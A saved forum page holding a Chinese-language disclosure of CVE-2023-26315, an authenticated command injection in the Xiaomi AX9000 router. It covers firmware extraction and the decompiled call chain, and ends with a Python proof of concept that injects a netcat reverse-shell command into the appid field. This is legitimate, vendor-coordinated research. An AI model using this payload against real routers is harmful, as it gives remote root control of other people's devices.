translateX(48px);-ms-transform:scale(.475) translateX(48px);transform:scale(.475) translateX(48px);-webkit-animation-timing-function:ease-out;animation-timing-function:ease-out}}@-webkit-keyframes rollIn{0%{opacity:0;-webkit-transform:translateX(-100%) rotate(-120deg);transform:translateX(-100%) rotate(-120deg)}100%{opacity:1;-webkit-transform:translateX(0) rotate(0);transform:translateX(0) rotate(0)}}@keyframes rollIn{0%{opacity:0;-webkit-transform:translateX(-100%) rotate(-120deg);-ms-transform:translateX(-100%) rotate(-120deg);transform:translateX(-100%) rotate(-120deg)}100%{opacity:1;-webkit-transform:translateX(0) rotate(0);-ms-transform:translateX(0) rotate(0);transform:translateX(0) rotate(0)}}@keyframes fadeIn{0%{opacity:0}100%{opacity:1}}@-webkit-keyframes shake{0%,100%{-webkit-transform:translateX(0);transform:translateX(0)}10%,30%,50%,70%,90%{-webkit-transform:translateX(-10px);transform:translateX(-10px)}20%,40%,60%,80%{-webkit-transform:translateX(10px);transform:translateX(10px)}}@keyframes shake{0%,100%{-webkit-transform:translateX(0);-ms-transform:translateX(0);transform:translateX(0)}10%,30%,50%,70%,90%{-webkit-transform:translateX(-10px);-ms-transform:translateX(-10px);transform:translateX(-10px)}20%,40%,60%,80%{-webkit-transform:translateX(10px);-ms-transform:translateX(10px);transform:translateX(10px)}}@-webkit-keyframes fadeIn{0%{opacity:0}100%{opacity:1}}@-webkit-keyframes bounceOut{100%{opacity:0;-webkit-transform:scale(.7);transform:scale(.7)}30%{-webkit-transform:scale(1.05);transform:scale(1.05)}0%{-webkit-transform:scale(1);transform:scale(1)}}@keyframes bounceOut{100%{opacity:0;-webkit-transform:scale(.7);-ms-transform:scale(.7);transform:scale(.
|
|||
|
|
* Waves v0.7.5
|
|||
|
|
* http://fian.my.id/Waves
|
|||
|
|
*
|
|||
|
|
* Copyright 2014-2016 Alfiana E. Sibuea and other contributors
|
|||
|
|
* Released under the MIT license
|
|||
|
|
* https://github.com/fians/Waves/blob/master/LICENSE
|
|||
|
|
*/</style><style>@media(max-height:620px){}@media(max-height:783px){}@-webkit-keyframes srFadeInUp{0%{opacity:0;-webkit-transform:translateY(100px);transform:translateY(100px)}to{opacity:1;-webkit-transform:translateY(0);transform:translateY(0)}}@keyframes srFadeInUp{0%{opacity:0;-webkit-transform:translateY(100px);transform:translateY(100px)}to{opacity:1;-webkit-transform:translateY(0);transform:translateY(0)}}@-webkit-keyframes srFadeInDown{0%{opacity:1;-webkit-transform:translateY(0);transform:translateY(0)}to{opacity:0;-webkit-transform:translateY(100px);transform:translateY(100px)}}@keyframes srFadeInDown{0%{opacity:1;-webkit-transform:translateY(0);transform:translateY(0)}to{opacity:0;-webkit-transform:translateY(100px);transform:translateY(100px)}}</style><style>@-webkit-keyframes fadeOutUp{0%{opacity:1}to{margin-top:0;padding:0;height:0;min-height:0;opacity:0;-webkit-transform:scaleY(0);transform:scaleY(0)}}@keyframes fadeOutUp{0%{opacity:1}to{margin-top:0;padding:0;height:0;min-height:0;opacity:0;-webkit-transform:scaleY(0);transform:scaleY(0)}}@media(pointer:coarse){}</style><style>:root{--sr-annote-color-0:#b4d9fb;--sr-annote-color-1:#ffeb3b;--sr-annote-color-2:#a2e9f2;--sr-annote-color-3:#a1e0ff;--sr-annote-color-4:#a8ea68;--sr-annote-color-5:#ffb7da}</style><style>@-webkit-keyframes sr-annote-slideInUp{0%{opacity:0;-webkit-transform:translate3d(0,100%,0);transform:translate3d(0,100%,0);visibility:visible}to{opacity:1;-webkit-transform:translateZ(0);transform:translateZ(0)}}@keyframes sr-annote-slideInUp{0%{opacity:0;-webkit-transform:translate3d(0,100%,0);transform:translate3d(0,100%,0);visibility:visible}to{opacity:1;-webkit-transform:translateZ(0);transform:translateZ(0)}}@-webkit-keyframes sr-annote-slideInDown{0%{opacity:1;visibility:visible}to{opacity:0;-webkit-transform:translate3d(0,100%,0);transform:translate3d(0,100%,0)}}@keyframes sr-annote-slideInDown{0%{opacity:1;visibility:visible}to{opacity:0;-webkit-transform:translate3d(0,100%,0);transform:translate3d(0,100%,0)}}</style><style>@-webkit-keyframes fadeInUp{0%{opacity:0;-webkit-transform:translate3d(0,100%,0);transform:translate3d(0,100%,0)}to{opacity:1;-webkit-transform:translateZ(0);transform:translateZ(0)}}@keyframes fadeInUp{0%{opacity:0;-webkit-transform:translate3d(0,100%,0);transform:translate3d(0,100%,0)}to{opacity:1;-webkit-transform:translateZ(0);transform:translateZ(0)}}@-webkit-keyframes fadeOutDown{0%{opacity:1;-webkit-transform:translateZ(0);transform:translateZ(0)}to{opacity:0;-webkit-transform:translate3d(0,100%,0);transform:translate3d(0,100%,0)}}@keyframes fadeOutDown{0%{opacity:1;-webkit-transform:translateZ(0);transform:translateZ(0)}to{opacity:0;-webkit-transform:translate3d(0,100%,0);transform:translate3d(0,100%,0)}}@-webkit-keyframes scaleAnimation{0%{opacity:0;-webkit-transform:scale(1.5);transform:scale(1.5)}to{opacity:1;-webkit-transform:scale(1);transform:scale(1)}}@keyframes scaleAnimation{0%{opacity:0;-webkit-transform:scale(1.5);transform:scale(1.5)}to{opacity:1;-webkit-transform:scale(1);transform:scale(1)}}@-webkit-keyframes fadeOut{0%{opacity:1}to{opacity:0}}@keyframes fadeOut{0%{opacity:1}to{opacity:0}}@-webkit-keyframes fadeIn{0%{opacity:0}to{opacity:1}}@keyframes fadeIn{0%{opacity:0}to{opacity:1}}@-webkit-keyframes swing{20%{-webkit-transform:rotate(15deg);transform:rotate(15deg)}40%{-webkit-transform:rotate(-10deg);transform:rotate(-10deg)}60%{-webkit-transform:rotate(5deg);transform:rotate(5deg)}80%{-webkit-transform:rotate(-5deg);transform:rotate(-5deg)}to{-webkit-transform:rotate(0deg);transform:rotate(0deg)}}@keyframes swing{20%{-webkit-transform:rotate(15deg);transform:rotate(15deg)}40%{-webkit-transform:rotate(-10deg);transform:rotate(-10deg)}60%{-webkit-transform:rotate(5deg);transform:rotate(5deg)}80%{-webkit-transform:rotate(-5deg);transform:rotate(-5deg)}to{-webkit-transform:rotate(0deg);transform:rotate(0deg)}}</style><style>@-webkit-keyframes fadeInUp{0%{opacity:0;-webkit-transform:translate3d(0,100%,0);transform:translate3d(0,100%,0)}to{opacity:1;-webkit-transform:translateZ(0);transform:transl
|
|||
|
|
<body>
|
|||
|
|
<div class="global-nav mb-50">
|
|||
|
|
<nav class="navbar navbar-inverse navbar-fixed-top">
|
|||
|
|
<div class="container nav">
|
|||
|
|
<div class="visible-xs header-response sf-hidden">
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
</div>
|
|||
|
|
<div class="row hidden-xs">
|
|||
|
|
<div class="col-sm-8 col-md-8 col-lg-8">
|
|||
|
|
<div class=navbar-header>
|
|||
|
|
<button type=button class="navbar-toggle collapsed sf-hidden" data-toggle=collapse data-target=#global-navbar>
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
</button>
|
|||
|
|
<div class=logo><a class="navbar-brand logo" href=https://forum.butian.net/></a></div>
|
|||
|
|
</div>
|
|||
|
|
<div class="collapse navbar-collapse" id=global-navbar>
|
|||
|
|
<ul class="nav navbar-nav">
|
|||
|
|
<li><a href=https://forum.butian.net/>首页 <span class=sr-only>(current)</span></a></li>
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
<li><a href=https://forum.butian.net/questions>问答</a></li>
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
<li><a href=https://forum.butian.net/shop>商城</a></li>
|
|||
|
|
|
|||
|
|
<li><a href=https://forum.butian.net/community>实战攻防技术</a></li>
|
|||
|
|
<li><a href=https://forum.butian.net/movable>活动</a></li>
|
|||
|
|
<li><a href=https://forum.butian.net/questions/Play>摸鱼办</a>
|
|||
|
|
|
|||
|
|
</li>
|
|||
|
|
</ul>
|
|||
|
|
<form role=search id=top-search-form action=https://forum.butian.net/search method=GET class="navbar-form hidden-sm hidden-xs pull-right">
|
|||
|
|
<span class="btn btn-link"><span class=sr-only>搜索</span><span class="glyphicon glyphicon-search"></span></span>
|
|||
|
|
<input type=text name=word id=searchBox class=form-control placeholder value>
|
|||
|
|
</form>
|
|||
|
|
</div>
|
|||
|
|
</div>
|
|||
|
|
|
|||
|
|
</div>
|
|||
|
|
</div>
|
|||
|
|
</nav>
|
|||
|
|
</div>
|
|||
|
|
<div class="top-alert mt-60 clearfix text-center">
|
|||
|
|
<!--[if lt IE 9]>
|
|||
|
|
<div class="alert alert-danger topframe" role="alert">你的浏览器实在<strong>太太太太太太旧了</strong>,放学别走,升级完浏览器再说
|
|||
|
|
<a target="_blank" class="alert-link" href="http://browsehappy.com">立即升级</a>
|
|||
|
|
</div>
|
|||
|
|
<![endif]-->
|
|||
|
|
|
|||
|
|
</div>
|
|||
|
|
<div class=wrap>
|
|||
|
|
<div class=container>
|
|||
|
|
<div class="row mt-10">
|
|||
|
|
<div class="col-xs-12 col-md-9 main" style=width:100%>
|
|||
|
|
<div class=widget-article>
|
|||
|
|
<h3 class="title word-wrap">小米AX9000路由器CVE-2023-26315漏洞挖掘</h3>
|
|||
|
|
<ul class=taglist-inline>
|
|||
|
|
<li class=tagPopup><a class=tag href=https://forum.butian.net/topic/51>硬件与物联网</a></li>
|
|||
|
|
<li class=tagPopup><a class=tag href=https://forum.butian.net/topic/48>漏洞分析</a></li>
|
|||
|
|
</ul>
|
|||
|
|
<div class="content mt-10">
|
|||
|
|
<div class="quote mb-20">
|
|||
|
|
分享一个笔者挖的小米AX9000路由器命令注入漏洞(CVE-2023-26315)的调用链分析。为了赏金挖洞,为了稿费发文,又要到饭了兄弟们!
|
|||
|
|
</div>
|
|||
|
|
<textarea id=md_view_content style=display:none>小米AX9000路由器CVE-2023-26315漏洞挖掘
|
|||
|
|
-----------------------------
|
|||
|
|
|
|||
|
|
> 为了赏金挖洞,为了稿费发文,又要到饭了兄弟们!
|
|||
|
|
|
|||
|
|
### 前言
|
|||
|
|
|
|||
|
|
一年多前,看到小米`SRC`公众号推文搞了个赏金活动,于是挖了挖当时比较新的一款`AX9000`路由器,挖到了两个命令注入漏洞,不过没什么本事,挖的都是授权后的,危害一般。小米给的赏金还是很可观的,但是补丁发布的速度不知为何比较慢(交了这么多厂商,还是`Zyxel`和华硕的响应速度最快),所以一直也没能分配`CVE`编号,我也遵守小米的规定在漏洞披露前未公开相关漏洞细节。
|
|||
|
|
|
|||
|
|
直到最近和其他朋友聊起这个漏洞,才想起来已经过去了一年多,应该是能公开了,于是又去找了小米`SRC`的运营小姐姐。经过一些流程的审批,得知这两个漏洞的确是已经推送完补丁可以披露了。不过有趣的是,小米申请的`2023`的`CVE`编号只剩一个了,`2024`的新编号还没申请,于是只先分配了一个漏洞的`CVE`,还有一个得等新编号。
|
|||
|
|
|
|||
|
|
正好和朋友聊到这个漏洞,也顺带回忆并简单记录了一下,想着既然写了就发出来吧。我这里也就先公开一个漏洞吧,另外一个后面看情况。时间有限,写的比较简略,希望能给各位师傅带来些许启发。
|
|||
|
|
|
|||
|
|
之后,可能会整理一些漏洞报告以及自己写的小工具放在我的`Github`上:<https://github.com/winmt>
|
|||
|
|
|
|||
|
|
### 漏洞信息
|
|||
|
|
|
|||
|
|
**漏洞编号:** [CVE-2023-26315](https://www.cve.org/CVERecord?id=CVE-2023-26315) / [CNVD-2024-23093](https://www.cnvd.org.cn/flaw/show/CNVD-2024-23093)
|
|||
|
|
|
|||
|
|
**安全通告及致谢:**
|
|||
|
|
|
|||
|
|
<https://trust.mi.com/zh-CN/misrc/bulletins/advisory?cveId=546>
|
|||
|
|
|
|||
|
|
<https://trust.mi.com/misrc/bulletins/advisory?cveId=546>
|
|||
|
|
|
|||
|
|
**漏洞描述:** 小米`AX9000`路由器在`1.0.168`版本及之前存在二进制漏洞(命令注入),该漏洞由于未对非法的`appid`做出有效限制而引起。已授权登录的攻击者在成功利用此漏洞后,可在远程目标设备上执行任意命令,并获得设备的最高控制权,造成权限提升。
|
|||
|
|
|
|||
|
|
BUT,怎么算`CVSS Score`应该都是`7.2+`高危,不太清楚官方的`6.5`是咋算的了QAQ
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
关于修复后的`1.0.174`版本的固件,厂商说明目前已经直接由云端推送补丁。
|
|||
|
|
|
|||
|
|
### 准备工作
|
|||
|
|
|
|||
|
|
首先,可以从官网下载对应版本的固件:[小米路由器AX9000 稳定版 1.0.168](https://cdn.cnbj1.fds.api.mi-img.com/xiaoqiang/rom/ra70/miwifi_ra70_firmware_cc424_1.0.168.bin)
|
|||
|
|
|
|||
|
|
小米的固件最外面用的是`UBIFS`文件系统,固件本身没有加密,先用`binwalk`解出一个`.ubi`文件,然后用`ubireader_extract_images xxx.ubi`,可以在`ubifs-root`内解出三个`.ubifs`文件,对其中的`xxx-ubi_rootfs.ubifs`用`binwalk`再解开,即可得到里面的`SquashFS`文件系统,也就是核心部分。
|
|||
|
|
|
|||
|
|
小米的前端也是用的`Lua`编写的,但是其中的`Lua`文件不是源码,而是编译后的二进制文件,所以我们需要对其进行反编译。目前,对`Lua`反编译的常用工具有[unluac](https://github.com/HansWessels/unluac)和[luadec](https://github.com/viruscamp/luadec)。但是小米对`Lua`的解释器做了魔改,就不能直接用这两个工具进行反编译了,所幸已有师傅对此做了研究,并给出了专门针对小米固件的反编译工具[unluac\_miwifi](https://github.com/NyaMisty/unluac_miwifi)和[luadec\_miwifi](https://github.com/NyaMisty/luadec_miwifi)。至于如何对被魔改的解释器或编译器所编译出来的`Lua`字节码进行逆向,网上也有不少文章,这里不再展开。
|
|||
|
|
|
|||
|
|
我这里用的是`unluac_miwifi`,最终可以编译出一个`unluac.jar`,但一次只能对一个`Lua`文件进行反编译,所以我们需要写一个批量处理的简单脚本:
|
|||
|
|
|
|||
|
|
```python
|
|||
|
|
import os
|
|||
|
|
|
|||
|
|
res = os.popen("find ./ -name *.lua").readlines()
|
|||
|
|
|
|||
|
|
for i in range(0, len(res)) :
|
|||
|
|
path = res[i].strip("\n")
|
|||
|
|
cmd = "java -jar /home/winmt/unluac_miwifi/build/unluac.jar " + path + " > " + path + ".dis"
|
|||
|
|
print(cmd)
|
|||
|
|
os.system(cmd)
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
小米`AX9000`路由器固件是`AArch64el`架构的,由于网上似乎没有公开的`AArch64`的内核与文件系统,系统级仿真可参考下面这篇文章的步骤`extract`出来`vmlinuz`和`initrd.img`:[https://www.diozero.com/boards/qemuaarch64\_bullseye.html](https://www.diozero.com/boards/qemuaarch64_bullseye.html)
|
|||
|
|
|
|||
|
|
此外,小米`AX9000`的固件中采用了`Apache Thrift`的框架,使用`C++`编写的版本,相关源码可见:<https://github.com/apache/thrift/tree/master/lib/cpp/src/thrift> ,也可参考网络上其他资料,初步认识后对接下来的逆向分析可能会有一些帮助。
|
|||
|
|
|
|||
|
|
### 漏洞细节
|
|||
|
|
|
|||
|
|
此部分只对该漏洞调用链做大致的分析,感兴趣的师傅可继续深入逆向分析相关细节。
|
|||
|
|
|
|||
|
|
在反编译的`/usr/lib/lua/luci/controller/api/xqdatacenter.lua`中,可以看到 URL `/api/xqdatacenter/request` 相关的`handler`函数是`tunnelRequest`函数,且访问`/api/xqdatacenter`这个节点是需要鉴权的(鉴权过程可在`/usr/lib/lua/luci/dispatcher.lua`的`authenticator.jsonauth`函数中找到):
|
|||
|
|
|
|||
|
|
```lua
|
|||
|
|
function L0()
|
|||
|
|
local L0, L1, L2, L3, L4, L5, L6
|
|||
|
|
L0 = node
|
|||
|
|
L1 = "api"
|
|||
|
|
L2 = "xqdatacenter"
|
|||
|
|
L0 = L0(L1, L2)
|
|||
|
|
L1 = firstchild
|
|||
|
|
L1 = L1()
|
|||
|
|
L0.target = L1
|
|||
|
|
L0.title = ""
|
|||
|
|
L0.order = 300
|
|||
|
|
L0.sysauth = "admin"
|
|||
|
|
L0.sysauth_authenticator = "jsonauth"
|
|||
|
|
L0.index = true
|
|||
|
|
...
|
|||
|
|
L1 = entry
|
|||
|
|
L2 = {}
|
|||
|
|
L3 = "api"
|
|||
|
|
L4 = "xqdatacenter"
|
|||
|
|
L5 = "request"
|
|||
|
|
L2[1] = L3
|
|||
|
|
L2[2] = L4
|
|||
|
|
L2[3] = L5
|
|||
|
|
L3 = call
|
|||
|
|
L4 = "tunnelRequest"
|
|||
|
|
L3 = L3(L4)
|
|||
|
|
L4 = _
|
|||
|
|
L5 = ""
|
|||
|
|
L4 = L4(L5)
|
|||
|
|
L5 = 301
|
|||
|
|
L1(L2, L3, L4, L5)
|
|||
|
|
...
|
|||
|
|
end
|
|||
|
|
index = L0
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
在函数`tunnelRequest`中,会对传入`payload`字段内的`JSON`数据(此处用的是`formvalue_unsafe`获取内容,显然这是一个不安全的函数,未过滤危险字符)用`binaryBase64Enc`函数在转成二进制后,进行`Base64`编码处理,然后拼接入`THRIFT_TUNNEL_TO_DATACENTER`所指代的命令中并执行。
|
|||
|
|
|
|||
|
|
```lua
|
|||
|
|
function L5()
|
|||
|
|
local L0, L1, L2, L3, L4, L5, L6, L7, L8
|
|||
|
|
L0 = require
|
|||
|
|
L1 = "xiaoqiang.util.XQCryptoUtil"
|
|||
|
|
L0 = L0(L1)
|
|||
|
|
L1 = L0.binaryBase64Enc
|
|||
|
|
L2 = _UPVALUE0_
|
|||
|
|
L2 = L2.formvalue_unsafe
|
|||
|
|
L3 = "payload"
|
|||
|
|
L2, L3, L4, L5, L6, L7, L8 = L2(L3)
|
|||
|
|
L1 = L1(L2, L3, L4, L5, L6, L7, L8)
|
|||
|
|
L2 = _UPVALUE1_
|
|||
|
|
L2 = L2.THRIFT_TUNNEL_TO_DATACENTER
|
|||
|
|
L2 = L2 % L1
|
|||
|
|
L3 = require
|
|||
|
|
L4 = "luci.util"
|
|||
|
|
L3 = L3(L4)
|
|||
|
|
L4 = _UPVALUE0_
|
|||
|
|
L4 = L4.write
|
|||
|
|
L5 = L3.exec
|
|||
|
|
L6 = L2
|
|||
|
|
L5 = L5(L6)
|
|||
|
|
L6 = nil
|
|||
|
|
L7 = false
|
|||
|
|
L8 = true
|
|||
|
|
L4(L5, L6, L7, L8)
|
|||
|
|
end
|
|||
|
|
tunnelRequest = L5
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
在`/usr/lib/lua/xiaoqiang/common/XQConfigs.lua`中,可以找到`THRIFT_TUNNEL_TO_DATACENTER`的相关定义:
|
|||
|
|
|
|||
|
|
```lua
|
|||
|
|
L0 = "thrifttunnel 0 '%s'"
|
|||
|
|
THRIFT_TUNNEL_TO_DATACENTER = L0
|
|||
|
|
L0 = "thrifttunnel 1 '%s'"
|
|||
|
|
THRIFT_TUNNEL_TO_SMARTHOME = L0
|
|||
|
|
L0 = "thrifttunnel 2 '%s'"
|
|||
|
|
THRIFT_TUNNEL_TO_SMARTHOME_CONTROLLER = L0
|
|||
|
|
L0 = "thrifttunnel 3 ''"
|
|||
|
|
THRIFT_TO_MQTT_IDENTIFY_DEVICE = L0
|
|||
|
|
L0 = "thrifttunnel 4 ''"
|
|||
|
|
THRIFT_TO_MQTT_GET_SN = L0
|
|||
|
|
L0 = "thrifttunnel 5 ''"
|
|||
|
|
THRIFT_TO_MQTT_GET_DEVICEID = L0
|
|||
|
|
L0 = "thrifttunnel 6 '%s'"
|
|||
|
|
THRIFT_TUNNEL_TO_MIIO = L0
|
|||
|
|
L0 = "thrifttunnel 7 '%s'"
|
|||
|
|
THRIFT_TUNNEL_TO_YEELINK = L0
|
|||
|
|
L0 = "thrifttunnel 8 '%s'"
|
|||
|
|
THRIFT_TUNNEL_TO_CACHECENTER = L0
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
可以看到,`THRIFT_TUNNEL_TO_DATACENTER`所指代的命令为`thrifttunnel 0 '%s'`。因此,最终所执行的完整命令是`thrifttunnel 0 'base64编码的payload字段'`,即`payload`字段中被`Base64`编码后的`Json`数据会被传入`thrifttunnel`程序中,且`option`为`0`。
|
|||
|
|
|
|||
|
|
在`/usr/sbin/thriftunnel`二进制文件中,`*(a2 + 16)`是传入的第二个参数,即`Base64`编码后的`payload`字段内的`Json`数据,其作为第一个参数被传入`sub_1B9B0`函数中,而`sub_1B9B0`函数的第二个参数`v11`此时是空串。
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
进入`sub_1B9B0`函数后,可以发现首先将与`a1`(`Base64`编码的`payload`字段)相关的数据作为参数传入了`sub_1F1F8`函数处理,并最终将其返回结果通过`string::assign()`赋值给了`a2`(即上一级的`v11`变量)。
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
`sub_1F1F8`函数看上去是做了一些编码转换的操作,可以猜测到这里就是做了`Base64`的解码工作。我们很容易根据其中抛出的异常信息确认我们的猜测,这里的确就是将`payload`字段内的`Json`数据进行了`Base64`解码。
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
我们再返回到主函数,进而当`*(a2 + 8)`即传入的第一个参数`option`为`0`时,会执行到`sub_1BAE0`函数,根据上文分析,其参数`v11`就是解码后的`Json`字符串。
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
在`sub_1BAE0`函数中,创建了`socket`,结合传入的参数(上级的`v11`变量)是`Json`字符串,很容易判断出此处会将`payload`字段的`Json`数据发送给本地`127.0.0.1`的`9090`端口(这里保护了端口的安全性,没有对外开放,我们想要找到未授权口而悬着的心也终于死了)。
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
`/usr/sbin/datacenter`程序一直挂在进程中,监听着`9090`端口,故我们的数据被传到了`datacenter`程序进一步处理。
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
在`datacenter`的`constructAPIMappingTable()`函数里分别执行了三个类的`sConstructMappingTable()`函数。
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
其中,都是通过`STL map`建立起了`api`编号(下文解释)和对应的处理函数`handler`间的映射关系。具体来看,有一些`api`是直接在`datacenter`中被处理的,有些是被进一步转发到了`/usr/sbin/indexservice`(`9088`端口)处理,另外一些则是被转发到了`/usr/sbin/plugincenter`(`9091`端口)中进一步处理。
|
|||
|
|
|
|||
|
|
我们在这里直接定位到该漏洞对应的`api`,在`datacenter::PluginApiCollection::sConstructMappingTable`中,当`api`为`629`的时候,对应的`handler`是`callPluginCenter`,其实从函数名就能看出来作用了,就是转发给`plugincenter`。
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
进去简单看一下,的确是发送给了本地的`9091`端口(同样,容易在`plugincenter`程序中找到,其监听着`9091`端口)。
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
在`DataCenterHandler::request`函数中,在调用`APIMapping::APIMapping`函数建立好上述的映射关系表后,紧接着调用了`APIMapping::redirectRequest`函数。其中,先获取了`Json`对象中的`api`字段的值,存放在`v8`变量中,然后经历了一个`for`循环,其中有对`v8`值的判断比较,最后执行了一个函数指针。这里需要稍微解释一下,此处的`a1`就是上面建立的`map`映射表,类型是`std::map<int,void (*)(json_object *,std::string &)>`,即第一个元素(键值)是整数,第二个元素(实值)是函数指针。所以此处的`for`循环就是对`map`的操作,但是都是用的偏移值,不好看出来具体是什么,其实这里也没必要去查源码,我们直接自己写一个`map`容器的遍历,然后静态编译出来,反编译后这些偏移值的含义也就都清楚了。此处的`for`循环其实就是执行了`map.find()`的操作,寻找了`map`中`key`为`v8`(即`api`值)的迭代器,偏移`+32`就是第一个键值元素(`api`值),偏移`+40`则是第二个实值元素(`handler`的函数指针)。显然,此处就是根据传入的`api`字段值调用对应的`handler`的过程。到这里,上述建立的`Mapping Table`中的映射关系也更加明朗了。
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
上文说过,当`api`为`629`时,传入的`payload`字段的数据会被转发给`plugincenter`程序处理。所以最后来到了`/usr/sbin/plugincenter`程序中,找到`datacenter::PluginApiMappingExtendCollection::sConstructMappingTable`函数,仍然是通过`map`建立了`api`编号和对应`handler`函数的映射关系。可以看到,当`api`编号为`629`的时候,会执行到`parseGetIdForVendor`函数进行处理。
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
在`parseGetIdForVendor`函数中,会将传入的`Json`数据内的`appid`字段作为参数传递到`PluginApi::getIdForVendor`函数中。
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
在`PluginApi::getIdForVendor`函数中,可以很明显地发现:**即使`appid`字段合法性检查不通过,也会被拼接入命令中并执行**。显然,这里是一个开发上的疏忽,在判断`!IsValidAppId`的条件分支内,在输出报错信息后,应当在最后加上`return ;`返回,不能继续执行下去。
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
因此,这里存在一个命令注入漏洞,该漏洞调用链至此分析完毕。
|
|||
|
|
|
|||
|
|
### Poc及演示结果
|
|||
|
|
|
|||
|
|
这里需要自行更改一下相关`IP`和`Token`值,此处注入了反弹`shell`的命令,端口`8888`。
|
|||
|
|
|
|||
|
|
```python
|
|||
|
|
import requests
|
|||
|
|
|
|||
|
|
server_ip = "192.168.50.1"
|
|||
|
|
client_ip = "192.168.50.105"
|
|||
|
|
token = "814c55713043e7358d3c1f42f2a98438"
|
|||
|
|
|
|||
|
|
nc_shell = ";rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc {} 8888 >/tmp/f;".format(client_ip)
|
|||
|
|
|
|||
|
|
res = requests.post("http://{}/cgi-bin/luci/;stok={}/api/xqdatacenter/request".format(server_ip, token), data={'payload':'{"api":629, "appid":"' + nc_shell + '"}'})
|
|||
|
|
|
|||
|
|
print(res.text)
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
### 写在最后
|
|||
|
|
|
|||
|
|
此篇文章仅作抛砖引玉,在`datacenter`,`plugincenter`以及`indexservice`内不同`api`的`handler`函数可能就有几百个(当然这里可以结合`fuzz`),以及`thriftunnel`的其他`option`操作也这么往下挖下去,我想应该也会存在漏洞。笔者也只是在小米当时赏金活动那几天大概看了看,后续也没再继续深入看这些地方了,本来想留着后面继续挖的,但是准备了一年保研感觉心态发生了一些奇妙的变化,研究生可能更想去尝试下其他更深入的方面,不想再做单纯的这样挖洞了,所以也就放出来了。感兴趣的读者可继续探索,挖到了也可以分享在评论区。
|
|||
|
|
|
|||
|
|
- - - - - -
|
|||
|
|
|
|||
|
|
**时间线:**
|
|||
|
|
|
|||
|
|
- 2023-03-26 提交漏洞报告至小米安全中心(Xiaomi Security Center)
|
|||
|
|
- 2023-04-03 厂商验证后确认两个漏洞存在,并开始修复漏洞
|
|||
|
|
- 2023-05-24 两个漏洞的赏金均到账(活动期间还翻倍了,挺爽)
|
|||
|
|
- 2023-06-09 厂商告知漏洞已全部修复完成(但似乎补丁未立即发布)
|
|||
|
|
- 2024-05-09 联系厂商分配其中一个漏洞编号 CVE-2023-26315 并披露
|
|||
|
|
- 2024-06-12 CNVD 收录本文漏洞,分配编号 CNVD-2024-23093 并公开</textarea>
|
|||
|
|
<div id=layer-photos-demo>
|
|||
|
|
<div id=md_view><div class=markdown-body><h2 blockindex=0>小米AX9000路由器CVE-2023-26315漏洞挖掘</h2>
|
|||
|
|
<blockquote blockindex=1>
|
|||
|
|
<p>为了赏金挖洞,为了稿费发文,又要到饭了兄弟们!</p>
|
|||
|
|
</blockquote>
|
|||
|
|
<h3 blockindex=2>前言</h3>
|
|||
|
|
<p blockindex=3>一年多前,看到小米<code>SRC</code>公众号推文搞了个赏金活动,于是挖了挖当时比较新的一款<code>AX9000</code>路由器,挖到了两个命令注入漏洞,不过没什么本事,挖的都是授权后的,危害一般。小米给的赏金还是很可观的,但是补丁发布的速度不知为何比较慢(交了这么多厂商,还是<code>Zyxel</code>和华硕的响应速度最快),所以一直也没能分配<code>CVE</code>编号,我也遵守小米的规定在漏洞披露前未公开相关漏洞细节。</p>
|
|||
|
|
<p blockindex=4>直到最近和其他朋友聊起这个漏洞,才想起来已经过去了一年多,应该是能公开了,于是又去找了小米<code>SRC</code>的运营小姐姐。经过一些流程的审批,得知这两个漏洞的确是已经推送完补丁可以披露了。不过有趣的是,小米申请的<code>2023</code>的<code>CVE</code>编号只剩一个了,<code>2024</code>的新编号还没申请,于是只先分配了一个漏洞的<code>CVE</code>,还有一个得等新编号。</p>
|
|||
|
|
<p blockindex=5>正好和朋友聊到这个漏洞,也顺带回忆并简单记录了一下,想着既然写了就发出来吧。我这里也就先公开一个漏洞吧,另外一个后面看情况。时间有限,写的比较简略,希望能给各位师傅带来些许启发。</p>
|
|||
|
|
<p blockindex=6>之后,可能会整理一些漏洞报告以及自己写的小工具放在我的<code>Github</code>上:<a href=https://github.com/winmt>https://github.com/winmt</a></p>
|
|||
|
|
<h3 blockindex=7>漏洞信息</h3>
|
|||
|
|
<p blockindex=8><strong>漏洞编号:</strong> <a href="https://www.cve.org/CVERecord?id=CVE-2023-26315">CVE-2023-26315</a> / <a href=https://www.cnvd.org.cn/flaw/show/CNVD-2024-23093>CNVD-2024-23093</a></p>
|
|||
|
|
<p blockindex=9><strong>安全通告及致谢:</strong></p>
|
|||
|
|
<p blockindex=10><a href="https://trust.mi.com/zh-CN/misrc/bulletins/advisory?cveId=546">https://trust.mi.com/zh-CN/misrc/bulletins/advisory?cveId=546</a></p>
|
|||
|
|
<p blockindex=11><a href="https://trust.mi.com/misrc/bulletins/advisory?cveId=546">https://trust.mi.com/misrc/bulletins/advisory?cveId=546</a></p>
|
|||
|
|
